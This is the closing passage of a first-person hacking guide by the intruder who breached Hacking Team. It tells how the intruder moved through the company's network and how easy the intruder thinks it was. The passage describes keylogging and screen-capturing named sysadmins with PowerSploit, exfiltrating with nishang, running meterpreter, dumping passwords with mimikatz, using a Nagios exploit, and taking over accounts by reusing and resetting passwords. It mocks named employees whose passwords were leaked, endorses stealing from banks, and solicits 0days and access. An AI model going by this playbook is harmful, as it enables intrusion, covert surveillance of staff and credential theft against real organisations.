  2. Read emails: As we have seen, you can download mail with powershell, and it has lots of useful information.
  3. Read sharepoint: It is another place where many companies keep important information. You can download it with powershell.
  4. Active Directory: It has a lot of useful information about users and computers. Without being admin, you can already find a lot of information with Powerview and other tools. After getting domain admin, you should export all the AD information with csvde or some other tool.
  5. Spying on employees: One of my favorite pastimes is hunting sysadmins. Spying on Christian Pozzi (sysadmin at Hacking Team) got me access to the Nagios server, which gave me access to the rete sviluppo (the development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit, nishang's Do-Exfiltration, and GPO, I can spy on any employee or even the entire domain.

— [ 14 – Catching Sysadmins ] —

When I read the documentation of their infrastructure, I realized that I still lacked access to something important: the “Rete Sviluppo”, an isolated network that stores all the RCS source code. The sysadmins of a company always have access to everything, so I searched the computers of Mauro Romeo and Christian Pozzi to see how they administered the sviluppo network, and to see if there were other interesting systems I should investigate. It was easy to access their computers, as they were part of the windows domain in which I already had admin access. Mauro Romeo's computer had no open ports, so I opened the WMI port to run meterpreter. In addition to recording keystrokes and screenshots with Get-Keystrokes and Get-TimedScreenshot, I used many of metasploit's modules/gather/, CredMan.ps1, and I searched for files. I saw that Pozzi had a Truecrypt volume, and I waited until he had mounted it to copy the files. Many have laughed at Christian Pozzi's weak passwords (and at Christian Pozzi in general; he offers enough material for comedy here, here, here, and here). I included them in the leak so I could laugh at him. The reality is that mimikatz and keyloggers see all passwords the same.

— [ 15 – The Bridge ] —

Within Christian Pozzi's encrypted volume there was a text file with many passwords. One was for a Fully Automated Nagios server, which had access to the sviluppo network in order to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit to execute code and get a shell (it is an unauthenticated exploit, but it requires a user to be logged in, which is where the password from the text file came in).

— [ 16 – Reusing and resetting passwords ] —

Reading the mail, I saw Daniele Milan granting access to git repositories. I already had his Windows password thanks to mimikatz. I tried it on the git server. Then I tried sudo, and it worked. For their Gitlab server and their twitter account, I used the “forgot my password” function together with my access to the mail server to reset the passwords.

— [17 – Conclusion] —

That is how it was done. That is how easy it is to take down a company and stop its abuses against human rights. That is the beauty and asymmetry of hacking: with only one hundred hours of work, a single person can undo years of crime of a multimillion-dollar company. Hacking gives us the possibility of fighting back and winning.

Hacking guides usually end with a warning: this information is only for educational purposes, be an ethical hacker, do not attack computers without permission, blah blah blah. I will say the same, but with a more rebellious idea of “ethical” hacking. It would be ethical hacking to leak documents, expropriate money from banks, and protect the computers of ordinary people. However, most of the people who call themselves “ethical hackers” only work to protect those who pay their consulting fees, who are often the same ones who deserve to be hacked.

At Hacking Team they see themselves as part of a tradition of inspiring Italian design. I see Vincenzetti, his company, and his cronies in the police, carabinieri, and government as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the raid on the Armando Diaz school, and to all those who have had their blood shed at the hands of Italian fascists.

— [ 18 – Contact ] —

To send me spearphishing attempts, death threats written in Italian and to give me 0days or access within banks, corporations, governments, etc.

Send only encrypted emails using: https://securityinabox.org/en/thunderbird_usarenigmail
